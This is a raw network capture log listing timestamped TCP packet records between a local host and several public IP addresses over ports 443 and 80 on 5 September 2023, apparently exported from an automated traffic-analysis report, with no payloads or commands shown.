                                                                                                                                                    Sep 5, 2023 13:01:21.784948111 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.784961939 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.005048990 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.005121946 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.005264997 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.005918026 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.005943060 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.452831030 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.452939987 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.506206989 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.506258965 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.506659985 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.507925987 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.551489115 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.679980993 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.700901031 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.700923920 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.701113939 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.701155901 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.701222897 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.730818033 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.730863094 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.731040955 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.731076956 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.783075094 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.840879917 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.840919971 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.841110945 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.841156006 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.841217995 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.864176989 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.864213943 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.864375114 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.864418030 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.864478111 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.882333994 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.882368088 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.882601976 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.882643938 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.882707119 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.896953106 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.896985054 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.897180080 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.897223949 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.897288084 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.976769924 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.976809025 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.977001905 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.977051020 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.977106094 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.991724014 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.991753101 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.992074013 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:22.992108107 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:22.992166996 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.002470016 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.002504110 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.002726078 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.002760887 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.002818108 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.014806986 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.014838934 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.015042067 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.015074968 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.015127897 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.025197983 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.025234938 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.025393963 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.025438070 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.025491953 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.038505077 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.038537979 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.038779020 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.038811922 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.038872004 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.043040037 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.043071985 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.043291092 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.043322086 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.043385983 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.057018995 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.057059050 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.057374001 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.057408094 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.057476044 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.116348028 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.116383076 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.116643906 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.116688967 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.116765976 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.125094891 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.125128984 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.125308990 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.125341892 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.125403881 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.131946087 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.131973982 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.132137060 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.132164955 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.132232904 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.138495922 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.138528109 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.138700008 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.138720989 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.138782024 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.145549059 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.145584106 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.145750999 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.145776987 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.145847082 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.151026964 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.151053905 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.151216984 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.151249886 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.151309967 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.157831907 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.157859087 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.158035040 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.158058882 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.158123970 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.163578033 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.163605928 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.163805008 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.163835049 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.163903952 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.169254065 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.169280052 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.169428110 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.169460058 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.169518948 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.174331903 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.174355984 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.174479008 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.174504995 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.174524069 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.174554110 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.179243088 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.179270029 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.179431915 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.179471016 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.179538012 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.184058905 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.184088945 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.184222937 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.184242964 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.184284925 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.184309959 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.188838959 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.188886881 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.188998938 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.189022064 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.189063072 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.189090967 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.193515062 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.193545103 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.193700075 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.193721056 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.193799973 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.198107004 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.198133945 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.198210001 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.198225975 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.198268890 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.198295116 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.202634096 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.202660084 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.202800989 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.202821970 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.202887058 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.206736088 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.206760883 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.206901073 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.206918955 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.206976891 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.254611969 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.254645109 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.254844904 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.254888058 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.254952908 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.259845972 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.259876013 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.260003090 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.260030031 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.260087013 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.264841080 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.264873028 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.265007973 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.265031099 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.265221119 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.268198967 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.268224001 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.268450022 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.268465996 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.268548012 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.270848036 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.270936012 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.271002054 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.271015882 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.271090984 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.279676914 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.279706001 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.279882908 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.279906988 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.281747103 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.281778097 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.281930923 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.281954050 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.282006979 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.282006979 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.282035112 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.282111883 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.282128096 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.285190105 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.285219908 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.285306931 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.285329103 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.285346985 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.288301945 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.288321972 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.288492918 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.288515091 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.292103052 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.292134047 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.292310953 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.292335033 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.295120955 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.295144081 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.295250893 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.295275927 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.295327902 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.295728922 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.295753002 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:23.295830011 CEST49719443192.168.2.4199.232.32.193
                                                                                                                                                    Sep 5, 2023 13:01:23.295840979 CEST44349719199.232.32.193192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:22.924163103 CEST4973780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:23.052695036 CEST8049737172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:23.053081036 CEST4973780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:23.053628922 CEST4973780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:23.185390949 CEST8049737172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:23.431405067 CEST8049737172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:23.431504965 CEST8049737172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:23.431525946 CEST8049737172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:23.431546926 CEST8049737172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:23.431736946 CEST4973780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:23.432241917 CEST4973780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:23.747433901 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:23.880337000 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:23.880527973 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:23.880969048 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.009150982 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302586079 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302638054 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302670956 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302701950 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302732944 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302764893 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302797079 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302828074 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302835941 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.302835941 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.302836895 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.302860022 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302895069 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302896023 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.302896023 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.302912951 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.302927971 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302946091 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.302961111 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.302980900 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.302994967 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.303009987 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.303024054 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.303042889 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.303050041 CEST8049738172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.303071976 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.303102970 CEST4973880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.492629051 CEST4973980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.621475935 CEST8049739172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.621659040 CEST4973980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.621959925 CEST4973980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.622896910 CEST4973980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:24.752727032 CEST8049739172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:24.754028082 CEST8049739172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.021404982 CEST8049739172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.021457911 CEST8049739172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.021718979 CEST4973980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:25.027235985 CEST4973980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:25.225616932 CEST4974080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:25.356409073 CEST8049740104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.356703043 CEST4974080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:25.357520103 CEST4974080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:25.359893084 CEST4974080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:25.485555887 CEST8049740104.21.60.111192.168.2.4
